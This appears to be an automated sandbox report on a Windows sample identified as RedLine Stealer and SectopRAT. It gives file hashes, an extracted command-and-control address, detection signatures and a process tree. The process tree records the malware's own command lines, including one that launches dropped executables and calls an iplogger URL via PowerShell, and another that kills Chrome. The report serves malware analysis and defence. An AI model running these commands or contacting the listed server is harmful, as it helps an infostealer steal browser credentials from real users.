Overview

overview

10

Static

static

1

virus.exe

windows7-x64

10

virus.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    284s
  • max time network
    297s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    17/04/2023, 19:12

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    virus.exe

  • Size

    508KB

  • MD5

    43967615d9e0e19bc59d32fdb5afd7e4

  • SHA1

    491d185c5fb89a0b72c1d9c61364f35a6d381fb4

  • SHA256

    f296b101028093e2c43930229590375a8a73335d08022c28d9c1cf0f84efb5b8

  • SHA512

    c122f036aba5d8c4a23d28d7d225d2e654bbcd32dc8a00a046501882b8410b87343f24380c2ab639a81a84581a39d7eadd4ee5191d74991f9d546d862f6e5123

  • SSDEEP

    6144:PtZlz6dpdLXUJkD6NS/H34jUrJ5yrIkzGbnuMKcAXDguOZ4KZGMI9Pp2T041v:Vz6dpdoymNS/ojoAOuMPAzMGMIp0J5

Score
10/10
redlinesectopratmrpenguininfostealerinfostealer_genericratspywarestealertrojan

Malware Config

Extracted

Family

redline

Botnet

MrPenguin

C2

86.38.225.74:16808

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 5 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

    trojanratsectoprat
  • SectopRAT payload 5 IoCs
  • Find unpacked information stealer based on crypto desktop apps 5 IoCs

    Detects infostealer.

    infostealer_generic
  • Find unpacked information stealer based on crypto extension 5 IoCs

    Detects infostealer.

    infostealer_generic
  • Find unpacked information stealer based on possible SQL query to retrieve broswer data 5 IoCs

    Detects infostealer.

    infostealer_generic
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\virus.exe
    "C:\Users\Admin\AppData\Local\Temp\virus.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1700
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /c start "" "build.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1124
      • C:\Users\Admin\AppData\Local\Temp\build.exe
        "build.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:572
      • C:\Users\Admin\AppData\Local\Temp\Yosdofwiqay.exe
        "Yosdofwiqay.exe"
        3⤵
        • Executes dropped EXE
        PID:336
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1536
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {2DFD6DF9-EA9C-4CE4-AE18-3BF33843CAA3} S-1-5-21-3430344531-3702557399-3004411149-1000:WFSTZEPN\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:888
    • C:\Windows\SYSTEM32\CMD.EXE
      C:\Windows\SYSTEM32\CMD.EXE /c taskkill /im chrome.exe /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:556
      • C:\Windows\system32\taskkill.exe
        taskkill /im chrome.exe /f
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:836

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Yosdofwiqay.exe
          Filesize

          558KB

          MD5

          61bb691f0c875d3d82521a6fa878e402

          SHA1

          e987b42ef3f2ae177e34fc77734f20a54298cae6

          SHA256

          6e3f0d9720e660b39419767a2856ce765a5c18b5d4f37af1889132e3b33b3008

          SHA512

          2e8c31dfd7d863ab8968f97de8b8d5e332de08b77808eeb74bd7766972841d978e722d91a43ab789828e3b524faf48fcbb11b98bade9b07a125db43ca02c891b

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\Yosdofwiqay.exe
          Filesize

          558KB

          MD5

          61bb691f0c875d3d82521a6fa878e402

          SHA1

          e987b42ef3f2ae177e34fc77734f20a54298cae6

          SHA256

          6e3f0d9720e660b39419767a2856ce765a5c18b5d4f37af1889132e3b33b3008

          SHA512

          2e8c31dfd7d863ab8968f97de8b8d5e332de08b77808eeb74bd7766972841d978e722d91a43ab789828e3b524faf48fcbb11b98bade9b07a125db43ca02c891b

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\build.exe
          Filesize

          95KB

          MD5

          0a62437e59df248af2eda97203611906

          SHA1

          b4407082f44e48389cf122e15cdbffd8f7e26619

          SHA256

          3fc8460a4875efb2ab36a9677d4119c6d473c829070290313dbf881bf84e86ae

          SHA512

          e2e95da15ad5afa28c309377288a26a73dd417c428abf10398ea4a35814fa8fbeed141100221df7097406610bbe445a932b40a4179ff3ed87f64c395afe0dddb

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\build.exe
          Filesize

          95KB

          MD5

          0a62437e59df248af2eda97203611906

          SHA1

          b4407082f44e48389cf122e15cdbffd8f7e26619

          SHA256

          3fc8460a4875efb2ab36a9677d4119c6d473c829070290313dbf881bf84e86ae

          SHA512

          e2e95da15ad5afa28c309377288a26a73dd417c428abf10398ea4a35814fa8fbeed141100221df7097406610bbe445a932b40a4179ff3ed87f64c395afe0dddb

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\nsy1BAD.tmp\ZXIFJ7G.dll
          Filesize

          6KB

          MD5

          293165db1e46070410b4209519e67494

          SHA1

          777b96a4f74b6c34d43a4e7c7e656757d1c97f01

          SHA256

          49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

          SHA512

          97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19

          Download Submit

        • \Users\Admin\AppData\Local\Temp\Yosdofwiqay.exe
          Filesize

          558KB

          MD5

          61bb691f0c875d3d82521a6fa878e402

          SHA1

          e987b42ef3f2ae177e34fc77734f20a54298cae6

          SHA256

          6e3f0d9720e660b39419767a2856ce765a5c18b5d4f37af1889132e3b33b3008

          SHA512

          2e8c31dfd7d863ab8968f97de8b8d5e332de08b77808eeb74bd7766972841d978e722d91a43ab789828e3b524faf48fcbb11b98bade9b07a125db43ca02c891b

          Download Submit

        • \Users\Admin\AppData\Local\Temp\Yosdofwiqay.exe
          Filesize

          558KB

          MD5

          61bb691f0c875d3d82521a6fa878e402

          SHA1

          e987b42ef3f2ae177e34fc77734f20a54298cae6

          SHA256

          6e3f0d9720e660b39419767a2856ce765a5c18b5d4f37af1889132e3b33b3008

          SHA512

          2e8c31dfd7d863ab8968f97de8b8d5e332de08b77808eeb74bd7766972841d978e722d91a43ab789828e3b524faf48fcbb11b98bade9b07a125db43ca02c891b

          Download Submit

        • \Users\Admin\AppData\Local\Temp\Yosdofwiqay.exe
          Filesize

          558KB

          MD5

          61bb691f0c875d3d82521a6fa878e402

          SHA1

          e987b42ef3f2ae177e34fc77734f20a54298cae6

          SHA256

          6e3f0d9720e660b39419767a2856ce765a5c18b5d4f37af1889132e3b33b3008

          SHA512

          2e8c31dfd7d863ab8968f97de8b8d5e332de08b77808eeb74bd7766972841d978e722d91a43ab789828e3b524faf48fcbb11b98bade9b07a125db43ca02c891b

          Download Submit

        • \Users\Admin\AppData\Local\Temp\build.exe
          Filesize

          95KB

          MD5

          0a62437e59df248af2eda97203611906

          SHA1

          b4407082f44e48389cf122e15cdbffd8f7e26619

          SHA256

          3fc8460a4875efb2ab36a9677d4119c6d473c829070290313dbf881bf84e86ae

          SHA512

          e2e95da15ad5afa28c309377288a26a73dd417c428abf10398ea4a35814fa8fbeed141100221df7097406610bbe445a932b40a4179ff3ed87f64c395afe0dddb

          Download Submit

        • \Users\Admin\AppData\Local\Temp\nsy1BAD.tmp\ZXIFJ7G.dll
          Filesize

          6KB

          MD5

          293165db1e46070410b4209519e67494

          SHA1

          777b96a4f74b6c34d43a4e7c7e656757d1c97f01

          SHA256

          49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

          SHA512

          97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19

          Download Submit

        • memory/572-69-0x0000000000A60000-0x0000000000A7E000-memory.dmp

          Filesize

          120KB

          Download

        • memory/1536-73-0x0000000002710000-0x0000000002750000-memory.dmp

          Filesize

          256KB

          Download

        • memory/1536-72-0x0000000002710000-0x0000000002750000-memory.dmp

          Filesize

          256KB

          Download